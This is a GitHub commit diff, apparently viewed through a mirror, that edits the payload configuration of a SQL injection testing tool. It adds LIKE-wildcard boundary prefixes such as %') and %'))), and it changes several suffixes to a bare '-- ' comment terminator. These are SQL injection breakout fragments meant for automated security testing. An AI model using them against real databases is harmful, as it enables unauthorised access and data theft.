Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 3a9e266

Browse files
committed
adding revisited wildcard LIKE payloads
1 parent 602369c commit 3a9e266

1 file changed

Lines changed: 42 additions & 6 deletions

File tree

xml/payloads.xml

Lines changed: 42 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -446,6 +446,42 @@ Formats:
446446
<prefix>"</prefix>
447447
<suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
448448
</boundary>
449+
450+
<boundary>
451+
<level>2</level>
452+
<clause>1</clause>
453+
<where>1,2</where>
454+
<ptype>2</ptype>
455+
<prefix>%')</prefix>
456+
<suffix></suffix>
457+
</boundary>
458+
459+
<boundary>
460+
<level>3</level>
461+
<clause>1</clause>
462+
<where>1,2</where>
463+
<ptype>2</ptype>
464+
<prefix>%'))</prefix>
465+
<suffix></suffix>
466+
</boundary>
467+
468+
<boundary>
469+
<level>4</level>
470+
<clause>1</clause>
471+
<where>1,2</where>
472+
<ptype>2</ptype>
473+
<prefix>%')))</prefix>
474+
<suffix></suffix>
475+
</boundary>
476+
477+
<boundary>
478+
<level>1</level>
479+
<clause>1</clause>
480+
<where>1,2</where>
481+
<ptype>2</ptype>
482+
<prefix>%'</prefix>
483+
<suffix></suffix>
484+
</boundary>
449485
<!-- End of WHERE/HAVING clause boundaries -->
450486

451487

@@ -456,7 +492,7 @@ Formats:
456492
<where>1,2</where>
457493
<ptype>2</ptype>
458494
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
459-
<suffix>-- AND ('[RANDSTR]'='[RANDSTR]</suffix>
495+
<suffix>-- </suffix>
460496
</boundary>
461497

462498
<boundary>
@@ -465,7 +501,7 @@ Formats:
465501
<where>1,2</where>
466502
<ptype>2</ptype>
467503
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
468-
<suffix>-- AND ("[RANDSTR]"="[RANDSTR]</suffix>
504+
<suffix>-- </suffix>
469505
</boundary>
470506

471507
<boundary>
@@ -474,7 +510,7 @@ Formats:
474510
<where>1,2</where>
475511
<ptype>1</ptype>
476512
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
477-
<suffix>-- AND ([RANDNUM1]=[RANDNUM1]</suffix>
513+
<suffix>-- </suffix>
478514
</boundary>
479515

480516
<boundary>
@@ -483,7 +519,7 @@ Formats:
483519
<where>1,2</where>
484520
<ptype>2</ptype>
485521
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
486-
<suffix>-- AND '[RANDSTR]'='[RANDSTR]</suffix>
522+
<suffix>-- </suffix>
487523
</boundary>
488524

489525
<boundary>
@@ -492,7 +528,7 @@ Formats:
492528
<where>1,2</where>
493529
<ptype>4</ptype>
494530
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
495-
<suffix>-- AND "[RANDSTR]"="[RANDSTR]</suffix>
531+
<suffix>-- </suffix>
496532
</boundary>
497533

498534
<boundary>
@@ -501,7 +537,7 @@ Formats:
501537
<where>1,2</where>
502538
<ptype>1</ptype>
503539
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
504-
<suffix>-- AND [RANDNUM1]=[RANDNUM1]</suffix>
540+
<suffix>-- </suffix>
505541
</boundary>
506542
<!-- End of pre-WHERE generic boundaries -->
507543

0 commit comments

Comments
 (0)